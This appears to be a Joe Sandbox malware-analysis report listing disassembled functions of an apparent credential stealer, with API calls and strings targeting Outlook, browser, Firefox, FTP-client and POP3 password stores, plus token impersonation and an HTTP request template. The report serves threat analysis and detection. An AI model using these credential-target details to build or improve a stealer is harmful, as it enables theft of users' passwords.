Opcode ID: 8c1b022f5ccfba05b787536624b35503ed059e4f9a4c2e1713a6aa9687add195
Instruction ID: 57a821cb36afe422aef635e17fbfd16116dcaba8d7923e0d6217dc199a0e1aca
Opcode Fuzzy Hash: 8c1b022f5ccfba05b787536624b35503ed059e4f9a4c2e1713a6aa9687add195
Instruction Fuzzy Hash: FB616272C00209BBEF12BFA1DC86EEDBA72AF04304F54853AF514741B1D77A5A60EB59

Function 0040F370 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A0E3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A11C
Part of subcall function 0040A0E3: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A125

Part of subcall function 0040A12E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A16A
Part of subcall function 0040A12E: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A173

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040F3B9
lstrcmpiA.KERNEL32(?,identification), ref: 0040F439
lstrcmpiA.KERNEL32(?,identitymgr), ref: 0040F44E
lstrcmpiA.KERNEL32(?,inetcomm server passwords), ref: 0040F471
lstrcmpiA.KERNEL32(?,outlook account manager passwords), ref: 0040F490
lstrcmpiA.KERNEL32(?,identities), ref: 0040F4AF
CoTaskMemFree.OLE32(00000000,?,inetcomm server passwords,?,identification), ref: 0040F510

Strings

outlook account manager passwords, xrefs: 0040F484
identification, xrefs: 0040F42D
identitymgr, xrefs: 0040F442
inetcomm server passwords, xrefs: 0040F465
identities, xrefs: 0040F4A3

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: lstrcmpi$ByteCharFreeMultiTaskWide
String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
API String ID: 636431001-4287852900
Opcode ID: b2b8908ddc6ce3047a6c7e1c13482f2f06bf3fe4a80a454f09d26ee9d9d98aae
Instruction ID: 5789a66e29a2bd99591765fce3debc4fe34dfaeb6171cd2c536a7f248842e80a
Opcode Fuzzy Hash: b2b8908ddc6ce3047a6c7e1c13482f2f06bf3fe4a80a454f09d26ee9d9d98aae
Instruction Fuzzy Hash: 5141497190021DBAEF219F50CD42FDA7B79BB05304F0041BAFA0875192DB799AE99FA4

Function 00402C70 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 61registryCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(?,explorer.exe,00000002,00000000), ref: 00402BBC
ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,explorer.exe,00000002,00000000), ref: 00402BE0
OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402C0A
OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 00402C22
ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00402C2F
RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402C50
CloseHandle.KERNEL32(?), ref: 00402C75
CloseHandle.KERNEL32(?,?), ref: 00402C7D
CloseHandle.KERNEL32(?), ref: 00402C87
Process32Next.KERNEL32(?,00000128), ref: 00402C99
CloseHandle.KERNEL32(?,00000002,00000000), ref: 00402CA9

Strings

explorer.exe, xrefs: 00402BB0

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
String ID: explorer.exe
API String ID: 3144406365-3187896405
Opcode ID: a977a2671e64b89284aa4797132b113ab425a37900813f33374cc771d936be96
Instruction ID: e9f66233cd172950b9059afcd66855f90edcf6bbd480f39b5c1ee9b837742415
Opcode Fuzzy Hash: a977a2671e64b89284aa4797132b113ab425a37900813f33374cc771d936be96
Instruction Fuzzy Hash: E0212C30904119ABEF219B61DD49BED7BB4BB04344F1080B7E508B21E1D7B89F85DF68

Function 0040B867 Relevance: 15.1, APIs: 6, Strings: 4, Instructions: 63stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00402745: lstrlenA.KERNEL32(?), ref: 00402779

StrStrIA.SHLWAPI(?,00416500), ref: 0040B87B
lstrcmpiA.KERNEL32(CONSTRAINT,?), ref: 0040B89D

Strings

username_value, xrefs: 0040B8FE
origin_url, xrefs: 0040B8CA
CONSTRAINT, xrefs: 0040B894
password_value, xrefs: 0040B8E4

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: lstrcmpilstrlen
String ID: CONSTRAINT$origin_url$password_value$username_value
API String ID: 3649823140-2401479949
Opcode ID: 16e4dc7e4ef01ce9c16bb48103be38913d76c0cfa088e7958cfbc766b5f3cc3d
Instruction ID: 4ad8d654800e676e8c0f777cd0841cf09402d808ff41cad8dd048d3ab0b6b04a
Opcode Fuzzy Hash: 16e4dc7e4ef01ce9c16bb48103be38913d76c0cfa088e7958cfbc766b5f3cc3d
Instruction Fuzzy Hash: F7114F36210108BADF512B25EC419DE3E92AB65798B00C13BF809A81B2E7FDC9D1969C

Function 004098FB Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 119COMMON

Download Yara Rule

Strings

Profile, xrefs: 004099AB
IsRelative, xrefs: 004099DE
profiles.ini, xrefs: 0040994C
Path, xrefs: 004099CA

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID:
String ID: IsRelative$Path$Profile$profiles.ini
API String ID: 0-4107377610
Opcode ID: 16b173c980c041cb8ef40059b41ae0beeef9dba8cf3cf2069a5cebe4f5dfc718
Instruction ID: a5cf65b25fed30015bcc003fb222cea83a273b45747e1a9c73aa150610851332
Opcode Fuzzy Hash: 16b173c980c041cb8ef40059b41ae0beeef9dba8cf3cf2069a5cebe4f5dfc718
Instruction Fuzzy Hash: 2B415231E4014ABAEF227B61CC42EAE7F62AF55344F10857BB410741F2DB7D8E91AB19

Function 00403A40 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 112networkstringCOMMON

Download Yara Rule

APIs

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403AAC
InternetCreateUrlA.WININET(0000003C,80000000,?,00001FFF), ref: 00403AD7
InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403B1D
wsprintfA.USER32 ref: 00403B3C
lstrlenA.KERNEL32(?,00002000,00002000), ref: 00403B5F
closesocket.WSOCK32(?,?,00002000,00002000), ref: 00403B89

Strings

GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403B34
<, xrefs: 00403AF7

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Internet$Crack$AllocCreateLocalclosesocketlstrlenwsprintf
String ID: <$GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
API String ID: 4072649068-555445111
Opcode ID: d5b6e7dc194c61fb16457503f2a04e989c6a0911f1b82a11c4ca794773bfea6a
Instruction ID: 745d6b9b5ac2693557a8ef43b3be1f9a406a0f3411fae1151c614a251de8c5b7
Opcode Fuzzy Hash: d5b6e7dc194c61fb16457503f2a04e989c6a0911f1b82a11c4ca794773bfea6a
Instruction Fuzzy Hash: 1041D771D00209EAEF11AFA1CC41FEDBEBAEF04349F10413AF500B52A1D7B96A56DB59

Function 004042AB Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004042B9
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004042D1
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004042E2
GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004042F1

Strings

kernel32.dll, xrefs: 004042B4
IsWow64Process, xrefs: 004042DC
GetNativeSystemInfo, xrefs: 004042CB

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: AddressProc$CurrentHandleModuleProcess
String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
API String ID: 977827838-3073145729
Opcode ID: b89d013479fd7981503fd72f968792317f90c829773311de0c1a3c6309231346
Instruction ID: b917eb2477d44a972aa321a1387145adad92c9960dbb5d4b81d2469f32f83685
Opcode Fuzzy Hash: b89d013479fd7981503fd72f968792317f90c829773311de0c1a3c6309231346
Instruction Fuzzy Hash: A1F05BB2700504A7C71061F56D55BDF26988BC03A8F241537B611E22C3F9FCCD814168

Function 0040D67F Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 91COMMON

Download Yara Rule

Strings

<setting name=", xrefs: 0040D6CC, 0040D6E2
value=", xrefs: 0040D70A, 0040D71D

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID:
String ID: <setting name="$value="
API String ID: 0-3468128162
Opcode ID: 254885ac01e82e6b167953d719254f945ca20f1f3678271b1f0b3f8db9da421c
Instruction ID: 96d0d4a0bd35fd51aa3680e7214a380573e8dbee4d8d9639b1d5f1cc1ff138dd
Opcode Fuzzy Hash: 254885ac01e82e6b167953d719254f945ca20f1f3678271b1f0b3f8db9da421c
Instruction Fuzzy Hash: 3A31A171D04149ABCF11ABE48C41AFEBFB59F1A354F144067E840B72A1E27D4A44DBAE

Function 00401E44 Relevance: 10.6, APIs: 7, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E65
GetFileSize.KERNEL32(00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E72
CreateFileMappingA.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00401E86
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E9B
CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401EAA
CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401EB1
CloseHandle.KERNEL32(?,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401EC0

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$Create$MappingSizeView
String ID:
API String ID: 3733816638-0
Opcode ID: 8e23c6091eb8b8d46222d4bd7a16ced24ceefb6a7b190282a42a8e05d4c96427
Instruction ID: e58b99f9114672f5a439125ee997312c2d25841e4d564c066b43b0378391f37c
Opcode Fuzzy Hash: 8e23c6091eb8b8d46222d4bd7a16ced24ceefb6a7b190282a42a8e05d4c96427
Instruction Fuzzy Hash: C9117570290305BBEB312F31CC83F493A94AB01B14F208566BA24BD1E6D6F895918A6C

Function 00BA331F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00BA88C0,00000008,00BA3427,00000000,00000000,?,00BA28EB,00000003), ref: 00BA3330
__lock.LIBCMT ref: 00BA3364

Part of subcall function 00BA3B86: __mtinitlocknum.LIBCMT ref: 00BA3B9C
Part of subcall function 00BA3B86: __amsg_exit.LIBCMT ref: 00BA3BA8
Part of subcall function 00BA3B86: EnterCriticalSection.KERNEL32(?,?,?,00BA3369,0000000D,?,00BA28EB,00000003), ref: 00BA3BB0

InterlockedIncrement.KERNEL32(00BA9320), ref: 00BA3371
__lock.LIBCMT ref: 00BA3385
___addlocaleref.LIBCMT ref: 00BA33A3

Strings

KERNEL32.DLL, xrefs: 00BA332B

Memory Dump Source

Source File: 00000001.00000002.2897701821.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.2897686886.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2897716978.0000000000BA7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2897731408.0000000000BAB000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ba0000_a5gvJhukP7.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: e9eb8c14be5c9c12decc70c20fb3ceb00b59bb44956a66ab37ff83320333533f
Instruction ID: 65036895dc877b88cb193361d6f4b791ecbaa6cbc46a09f5207ccca701533cb6
Opcode Fuzzy Hash: e9eb8c14be5c9c12decc70c20fb3ceb00b59bb44956a66ab37ff83320333533f
Instruction Fuzzy Hash: C80161B144CB009FD720AF65D806749FBE0AF52721F10898DF496977A0CFB4AA44CB14

Function 00408512 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

ftp://, xrefs: 004086C6
http://, xrefs: 004086D7
https://, xrefs: 004086E8

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID:
String ID: ftp://$http://$https://
API String ID: 0-2804853444
Opcode ID: 4d68b3de213bbb533016e734cc27d80bb7f6b0bac407aa0c9eb288f7c5a91484
Instruction ID: 14430d2e4d9b139479b5fe05e3a207768cfdf8799f0472e7796ca7e05dbc069a
Opcode Fuzzy Hash: 4d68b3de213bbb533016e734cc27d80bb7f6b0bac407aa0c9eb288f7c5a91484
Instruction Fuzzy Hash: E861F531800109FEDF11AF91CE45AEEBBB9EF00348F10847BB841B51A1DB799B95DB98

Function 0040DF29 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 101COMMON

Download Yara Rule

Strings

winex=", xrefs: 0040DF76, 0040DF8C
"/>, xrefs: 0040DF9B

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID:
String ID: "/>$winex="
API String ID: 0-1498080979
Opcode ID: 4e862831afe429a7723c9b686257d36e225ec81e112ed963a066b6d85ff6b397
Instruction ID: b71ab493d91fb56135b99ac2328879410403397ffda07896cc69c168d2b1a5e1
Opcode Fuzzy Hash: 4e862831afe429a7723c9b686257d36e225ec81e112ed963a066b6d85ff6b397
Instruction Fuzzy Hash: 65312D32D0011ABADF11BBA2CC02DFE7E76AF45344F10843BF501B51B1D7BA5A61AB69

Function 00407FA7 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(011B3E08,FTPCON), ref: 00407FD5
StrStrIA.SHLWAPI(011B4128,FTP CONTROL,00000000,011B3E08,FTPCON), ref: 00407FE1

Strings

FTPCON, xrefs: 00407FCF
\Profiles, xrefs: 00407FF5
FTP CONTROL, xrefs: 00407FDB
.prf, xrefs: 00408006

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID:
String ID: .prf$FTP CONTROL$FTPCON$\Profiles
API String ID: 0-2908215140
Opcode ID: 97d11c7c0650f9f65763c2a736fe66c13482c928f6a8389b9809e5d0a63b14f2
Instruction ID: f802c4ae2033febdf439d4724e9f93f67ccd725fe0446867c1b7fdfc124186e1
Opcode Fuzzy Hash: 97d11c7c0650f9f65763c2a736fe66c13482c928f6a8389b9809e5d0a63b14f2
Instruction Fuzzy Hash: 4A01F534500504BADB217B719C06FEF3E599BC1364F24813BF940B61E2EB7C5A82879C

Function 00BA49BB Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00BA49C7

Part of subcall function 00BA344C: __getptd_noexit.LIBCMT ref: 00BA344F
Part of subcall function 00BA344C: __amsg_exit.LIBCMT ref: 00BA345C

__amsg_exit.LIBCMT ref: 00BA49E7
__lock.LIBCMT ref: 00BA49F7
InterlockedDecrement.KERNEL32(?), ref: 00BA4A14
_free.LIBCMT ref: 00BA4A27
InterlockedIncrement.KERNEL32(00BA9320), ref: 00BA4A3F

Memory Dump Source

Source File: 00000001.00000002.2897701821.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.2897686886.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2897716978.0000000000BA7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2897731408.0000000000BAB000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ba0000_a5gvJhukP7.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 5701f63cc9cfb677384c1952027d3023dc48f1614d7469fdf4eeb4cf3c63848f
Instruction ID: f00341591ab9248757cb41007319901de1e56ab9d7bd18d9429514e90bccfb97
Opcode Fuzzy Hash: 5701f63cc9cfb677384c1952027d3023dc48f1614d7469fdf4eeb4cf3c63848f
Instruction Fuzzy Hash: CA016D72A4C721ABD721AB689806B9FB3E0EB87B21F040195F414676A2CFB45D80DBD5

Function 00401A0F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

GetHGlobalFromStream.OLE32(?,?), ref: 00401A22
GlobalLock.KERNEL32(?), ref: 00401A3D

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

GlobalUnlock.KERNEL32(?), ref: 00401A65
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401A6D

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

CRYPTED0YUI1.0, xrefs: 00401A9E

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Global$Local$AllocFreeFromLockStreamUnlocklstrlen
String ID: CRYPTED0YUI1.0
API String ID: 4083238039-1217275205
Opcode ID: 4d81ad40abc305974e2888dfa37e3fa96d503f79ed9f079c765dd97055f4b2fa
Instruction ID: 44e6d32a09d00c737fe28e090605fbfa6fdc0fd6aad9ff8f1e32deb7298a9f99
Opcode Fuzzy Hash: 4d81ad40abc305974e2888dfa37e3fa96d503f79ed9f079c765dd97055f4b2fa
Instruction Fuzzy Hash: 03119775D0010DBBDF026FA5CC429DD7F76AF04348F00817AB914B51B2D77A9BA1AB48

Function 0040F8AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetHGlobalFromStream.OLE32(?,?,0040F8C0), ref: 0040F8D0
GlobalLock.KERNEL32(?), ref: 0040F8F1
GlobalUnlock.KERNEL32(?), ref: 0040F909
StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?,0040F8C0), ref: 0040F924

Strings

STATUS-IMPORT-OK, xrefs: 0040F91C

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Global$FromLockStreamUnlock
String ID: STATUS-IMPORT-OK
API String ID: 2287449323-1591331578
Opcode ID: 738e2649d5f168214c34fb7b132fde0e1642fa1de53005cf062b85737f1486cb
Instruction ID: e9a1e65df7326eb098ec69f3952359934b43089917577e5a60db32ab76f4fbe3
Opcode Fuzzy Hash: 738e2649d5f168214c34fb7b132fde0e1642fa1de53005cf062b85737f1486cb
Instruction Fuzzy Hash: 44015B71D0420CBBEF117BA2CD42A9D7B35AB01348F1081BBB850B11B2DB798A959A18

Function 00402272 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87

lstrlenA.KERNEL32(?), ref: 00402286
StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9

Strings

.exe, xrefs: 0040229F

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID: .exe
API String ID: 2414487701-4119554291
Opcode ID: bcdcc7ae0c40e859a05769187829805d13d282145717d4f82db59d9dcc97e831
Instruction ID: c4a03ac4e2a01c3cff7cfce351da15b716edf576a091f982ddc866c95ea47b67
Opcode Fuzzy Hash: bcdcc7ae0c40e859a05769187829805d13d282145717d4f82db59d9dcc97e831
Instruction Fuzzy Hash: A0F0C83120428579E72272A59D09BAF7F955B93744F24417FF500B62C2DBFCD882927E

Function 0040E465 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

<POP3_Password2, xrefs: 0040E4D3

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID:
String ID: <POP3_Password2
API String ID: 0-2923094552
Opcode ID: d9f474490d6a343b982c02591334732ffbbb79e7f9b79a0ff29d877bbbae0f02
Instruction ID: 2ca97c7d808ca1c1dc6ede0b735ecbf111c3d0c46ddc32b51a1637cf303f0207
Opcode Fuzzy Hash: d9f474490d6a343b982c02591334732ffbbb79e7f9b79a0ff29d877bbbae0f02
Instruction Fuzzy Hash: 30412F31904019FEDF116BA2CC018EE7E76AF48358F144937F501B51F1E7798E61ABA9

Function 0040CB96 Relevance: 7.6, APIs: 5, Instructions: 79stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CBC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040CBEC
StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CC10
lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CC32

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CC1D

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: ByteCharLocalMultiWidelstrlen$AllocFree
String ID:
API String ID: 1890766102-0
Opcode ID: 934b97756b6a700027879f897ee5652c65a55fe5b21a80c67ea77db47f541946
Instruction ID: 7ab95b7534d6579ed3b9767e0ae932743c93dee75aa345241b3a12643bdaad8a
Opcode Fuzzy Hash: 934b97756b6a700027879f897ee5652c65a55fe5b21a80c67ea77db47f541946
Instruction Fuzzy Hash: 52216F71D44208FFFF116BA1CC86F9E7F75AB04314F20816AB214B91E1D7BD5A909B68

Function 00BA5D70 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00BA5D7E

Part of subcall function 00BA5C5A: __FF_MSGBANNER.LIBCMT ref: 00BA5C73
Part of subcall function 00BA5C5A: __NMSG_WRITE.LIBCMT ref: 00BA5C7A
Part of subcall function 00BA5C5A: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00BA4F26,?,00000001,?,?,00BA3B11,00000018,00BA8930,0000000C,00BA3BA1), ref: 00BA5C9F

_free.LIBCMT ref: 00BA5D91

Memory Dump Source

Source File: 00000001.00000002.2897701821.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.2897686886.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2897716978.0000000000BA7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2897731408.0000000000BAB000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ba0000_a5gvJhukP7.jbxd

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: 126aa0cd4bbaf6bd83302dc6565e0073fdbdffde6e56ae5bd07109f0123fce88
Instruction ID: 446e706f0486d37425003de9031f07398d228627da88ef32c62dcaa9a64c6502
Opcode Fuzzy Hash: 126aa0cd4bbaf6bd83302dc6565e0073fdbdffde6e56ae5bd07109f0123fce88
Instruction Fuzzy Hash: A811863284CA10AFCB312F74AC09A5A3AE5DF97761B2105B6F94896150DF318B4196A0

Function 00405A01 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(011B4128,FTP Navigator), ref: 00405A2F
StrStrIA.SHLWAPI(011B4128,FTP Commander,011B4128,FTP Navigator), ref: 00405A5D

Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

FTP Navigator, xrefs: 00405A29
ftplist.txt, xrefs: 00405A44, 00405A72
FTP Commander, xrefs: 00405A57

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

